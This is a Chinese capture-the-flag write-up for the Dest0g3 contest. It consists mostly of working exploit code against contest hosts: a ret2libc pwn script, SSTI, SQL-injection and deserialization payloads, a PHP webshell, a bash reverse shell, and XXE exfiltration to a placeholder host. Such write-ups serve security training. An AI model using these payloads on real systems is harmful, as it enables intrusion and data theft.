Dest0g3迎新赛wp
签到
签到
ez_pwn
from pwn import *
context(os='linux', arch='i386', log_level='debug')
context.log_level='info'
elf=ELF('./p')
rop=ROP(elf)
# p=process('./p')
p=remote('node4.buuoj.cn',28566)
def add(num):
p.recvuntil('ut your choice:\n')
p.sendline('1')
p.recvuntil('input num\n')
p.sendline(num)
def pad():
p.recvuntil("th of array:\n")
p.sendline('-2147483648')
for i in range(10):
add('0')
add('114514')
#choice
add('1')
# count
add('17')
plt_addr=elf.plt['puts']
hackme_addr=elf.sym['hackme']
libc_start_main_got = elf.got['__libc_start_main']
puts_got=elf.got['puts']
def get_libc():
plt_addr=elf.plt['puts']
hackme_addr=elf.sym['hackme']
libc_start_main_got = elf.got['__libc_start_main']
puts_got=elf.got['puts']
pad()
add(str(plt_addr))
add(str(hackme_addr))
add(str(libc_start_main_got))
p.sendlineafter('ut your choice:\n','4')
p.recvuntil('exit!\n')
libc_start_main_addr =u32(p.recv(4).ljust(4, '\x00'))
pad()
add(str(plt_addr))
add(str(hackme_addr))
add(str(puts_got))
p.sendlineafter('ut your choice:\n','4')
p.recvuntil('exit!\n')
puts_got =u32(p.recv(4).ljust(4, '\x00'))
print('[*] libc_start_main_addr: '+hex(libc_start_main_addr))
print('[*] puts_got_addr : '+hex(puts_got))
def pwn(libc):
pad()
add(str(plt_addr))
add(str(hackme_addr))
add(str(libc_start_main_got))
p.sendlineafter('ut your choice:\n','4')
p.recvuntil('exit!\n')
libc_start_main_addr =u32(p.recv(4).ljust(4, '\x00'))
print('[*] libc_start_main_addr: '+hex(libc_start_main_addr))
base=libc_start_main_addr-libc.symbols['__libc_start_main']
binsh=base+next(libc.search('/bin/sh'))
system=base+libc.symbols['system']
pad()
add(str(signed(system)))
add('1919810')
add(str(signed(binsh)))
p.sendlineafter('ut your choice:\n','4')
p.recvuntil('exit!\n')
p.interactive()
# get_libc()
libc=ELF('./1.6.so')
pwn(libc)
phpdest
用这个文章的payload
https://www.anquanke.com/post/id/213235
EasyPHP
post ctf[]=1触发报错
simple rce
取反码
echo urlencode(~"cat ./*;cat /*;");
// (~urldecode("%8C%86%8C%8B%9A%92"))(~urldecode("%88%97%90%9E%92%96"));
funny_upload
上传.htaccess
AddType application/x-httpd-php png
php_value auto_append_file /flag
然后传foo.png,访问
easy ssti
import requests
pay="{% set zero = (self|int) %}{% set one = (zero**zero)|int %}{% set two = (zero-one-one)|abs %}{% set four = (two*two)|int %}{% set five = (two*two*two)-one-one-one %}{% set three = five-one-one %}{% set nine = (two*two*two*two-five-one-one) %}{% set seven = (zero-one-one-five)|abs %}{% set space = self|string|min %}{% set point = self|float|string|min %}{% set c = dict(c=aa)|reverse|first %}{% set bfh = self|string|urlencode|first %}{% set bfhc = bfh~c %}{% set slas = bfhc%((four~seven)|int) %}{% set yin = bfhc%((three~nine)|int) %}{% set xhx = bfhc%((nine~five)|int) %}{% set right = bfhc%((four~one)|int) %}{% set left = bfhc%((four~zero)|int) %}{% set but = dict(buil=aa,tins=dd)|join %}{% set imp = dict(imp=aa,ort=dd)|join %}{% set pon = dict(po=aa,pen=dd)|join %}{% set so = dict(o=aa,s=dd)|join %}{% set ca = dict(ca=aa,t=dd)|join %}{% set flg = dict(fl=aa,ag=dd)|join %}{% set ev = dict(ev=aa,al=dd)|join %}{% set red = dict(re=aa,ad=dd)|join %}{% set bul = xhx~xhx~but~xhx~xhx %}{% set ini = dict(ini=aa,t=bb)|join %}{% set glo = dict(glo=aa,bals=bb)|join %}{% set itm = dict(ite=aa,ms=bb)|join %}{% set pld = xhx~xhx~imp~xhx~xhx~left~yin~so~yin~right~point~pon~left~yin~ca~space~slas~flg~yin~right~point~red~left~right %}{% for f,v in (self|attr(xhx~xhx~ini~xhx~xhx)|attr(xhx~xhx~glo~xhx~xhx)|attr(itm))() %}{% if f == bul %}{% for a,b in (v|attr(itm))() %}{% if a == ev %}{{b(pld)}}{% endif %}{% endfor %}{% endif %}{% endfor %}"
pay=pay.replace(' ','\n')
r=requests.post(url='http://fc94b957-c0f8-4d55-97e7-af20cd377917.node4.buuoj.cn:81/login',data={
'username':pay,
'password':'123'
})
print(r.text)
middle
用pker写的
backdoor=GLOBAL('config', 'backdoor')
backdoor(["__import__('os').system('bash -c \\'bash -i >& /dev/tcp/ip/port 0>&1\\'')"])
return
pharpop
用tree写phar,末尾少写一个}绕过报错。phar反序列化报错用gc回收机制绕
http://arsenetang.com/2021/11/29/WP篇之解析GFCTF---文件查看器/#构造pop链
最后实例化原生类DirectoryIterator配合glob协议读目录,再SplFileObject读文件
<?php
class air{
public $p;
}
class tree{
public $name;
public $act;
}
class apple {
public $xxx;
public $flag;
}
class D {
public $start;
}
class banana {
}
$t1 = new tree();
$t1->act = "DirectoryIterator";
// $t1->act = "SplFileObject";
$air = new air();
$air->p = $t1;
$apple = new apple();
$apple->xxx = $air;
$apple->flag = "glob:///f*";
// $apple->flag = "/fflaggg";
$t2 = new tree();
$t2->name = $apple;
$t3 = new tree();
$t3->name = $t2;
$exp=array($t3,null);
$phar_file = serialize($t3);
echo $phar_file;
$filename = 'poc.phar';// 后缀必须为phar,否则程序无法运行
file_exists($filename) ? unlink($filename) : null;
$phar=new Phar($filename);
$phar->startBuffering();
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ");
$phar->setMetadata($exp);
$phar->addFromString("foo.txt","bar");
$phar->stopBuffering();
import requests
import gzip
from hashlib import sha1
import io
url='http://9c2714e2-6a43-4c97-815c-b7e31785fbad.node4.buuoj.cn:81/'
# url='http://127.0.0.1:8989'
# r=requests.post(url,data={'0':'flag','1':'O:1:"D":1:{s:5:"start";s:1:"r";'})
# r=requests.post(url,data={'0':open('poc.png','rb'),'1':'O:1:"D":1:{s:5:"start";s:1:"w";'})
# /tmp/611a123795fb16602f0762cc3905a90c.jpg
# r=requests.post(url,data={'0':'phar:///tmp/611a123795fb16602f0762cc3905a90c.jpg','1':'O:1:"D":1:{s:5:"start";s:1:"r";'})
def sign(name):
f = open(name, 'rb').read() # 修改内容后的phar文件
s = f[:-28] # 获取要签名的数据
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s+sha1(s).digest()+h # 数据 + 签名 + 类型 + GBMB
open('signed.phar', 'wb').write(newf) # 写入新文件
def compress(name):
with open(name,'rb') as f1:
content = f1.read()
f = gzip.open('signed.phar.gz', 'wb')
f.write(content)
f.close()
def write(name):
r=requests.post(url,data={'0': open(name, 'rb').read(),'1':'O:1:"D":1:{s:5:"start";s:1:"w";'})
print(r.text)
def read(name):
r=requests.post(url,data={'0':'phar://'+name,'1':'O:1:"D":1:{s:5:"start";s:1:"r";'})
print(r.text)
def make():
# sign('poc.phar')
# compress('signed.phar')
write('signed.phar.gz')
# make()
read('/tmp/c60420862a82f1d08f0c980f23ee6eef.jpg')
ezip
文件名/////让解压fail
import zipfile
if __name__ == "__main__":
try:
binary = '111'
zipFile = zipfile.ZipFile("test2.zip", "a", zipfile.ZIP_DEFLATED)
info = zipfile.ZipInfo("test2.zip")
zipFile.writestr("1.php", '<?php eval($_POST["1"]); ?>')
zipFile.writestr("/////", binary)
zipFile.close()
except IOError as e:
raise e
suid提权,再/usr下找到了nl,nl /flag
node so easy
def pwn(payload):
r=requests.post(url,json=payload)
print(r.text)
if __name__ == '__main__':
payload={
"constructor": {
"prototype": {
"client": "true",
"escapeFunction": "1;return process.mainModule.require('fs').readFileSync('/flag').toString()//"
}
}
}
pwn(payload)
两道sql
benchmark时间注入
import requests
import time
url='http://b63d2144-cc9a-4649-8046-a11a28dd2cb1.node4.buuoj.cn:81'
def test(bool):
before=time.time()
user=f"'||if(({bool}),(benchmark(1000000,sha(1))),0)||'1"
print(user)
r=requests.post(url,data={
'username':user,
'password':'123'
})
after=time.time()
delta=after-before
return True if delta>1 else False
def pwn():
select="database()"
select="select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')"
select="select(group_concat(column_name))from(information_schema.columns)where(table_name='flaggg')"
select="select(cmd)from(flaggg)"
result=''
for pos in range(1,100):
guess=32
while True:
bool=f'ascii(mid(({select}),{pos},1))={guess}'
if test(bool):
break
guess+=1
if guess==127:
print(result)
return
result+=chr(guess)
print(result)
if __name__=='__main__':
# print(test("select(database())='ctf'"))
pwn()
ezserial
/admin下cookie注入,commonscollections6弹shell
ljctr
改一下com.mchange.v2.naming.ReferenceIndirector#IndirectlySerialized
public IndirectlySerialized indirectForm(Object paramObject) throws Exception {
Properties pros=new Properties();
Name name=new CompoundName("rmi://ip:1234/Evil",pros);
return new ReferenceSerialized(null, null, name, this.environmentProperties);
}
rmi server返回org.apache.catalina.users.MemoryUserDatabaseFactory,XXE
package com.example.idea;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.apache.naming.ResourceRef;
import javax.naming.StringRefAddr;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class Server {System.setProperty("java.rmi.server.hostname","Ip");
public static void main(String[] args) throws Exception {
Registry registry = LocateRegistry.createRegistry(1234);
ResourceRef ref=new ResourceRef("org.apache.catalina.UserDatabase", null, "", "", true,"org.apache.catalina.users.MemoryUserDatabaseFactory",null);
ref.add(new StringRefAddr("pathname", "http://ip/post.xml"));
ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
registry.bind("Evil", referenceWrapper);
}
}
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag[
<!ENTITY % dtd SYSTEM "http://ip/exp.xml">
%dtd;
%int;
%send;
]>
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
生成base64
package com.example.idea;
import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import com.mchange.v2.naming.ReferenceIndirector;
import com.mchange.v2.ser.IndirectlySerialized;
import javax.naming.*;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import java.io.*;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.Enumeration;
import java.util.Properties;
import java.util.logging.Logger;
import java.util.Base64;
public class Test {
public static void main(String[] args) throws Exception{
// com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized
// Name name=new CompoundName("rmi://127.0.0.1:1234/Evil",pros);
PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
// Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource(className, url));
// javax.el.ELProcessor
byte[] bb=serialize(b);
System.out.println(Base64.getEncoder().encodeToString(bb));
deserialize(bb);
// org.yaml.snakeyaml.Yaml
}
public static byte[] serialize(Object o) {
try {
ByteArrayOutputStream aos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(aos);
oos.writeObject(o);
oos.flush();
oos.close();
return aos.toByteArray();
} catch (Exception e) {
e.printStackTrace();
}
return null;
}
public static void deserialize(byte[] bytes) {
try {
ByteArrayInputStream ais = new ByteArrayInputStream(bytes);
ObjectInputStream ois = new ObjectInputStream(ais);
ois.readObject();
ois.close();
} catch (Exception e) {
e.printStackTrace();
}
}
}
起rmi,发包,看看logs即可收到flag
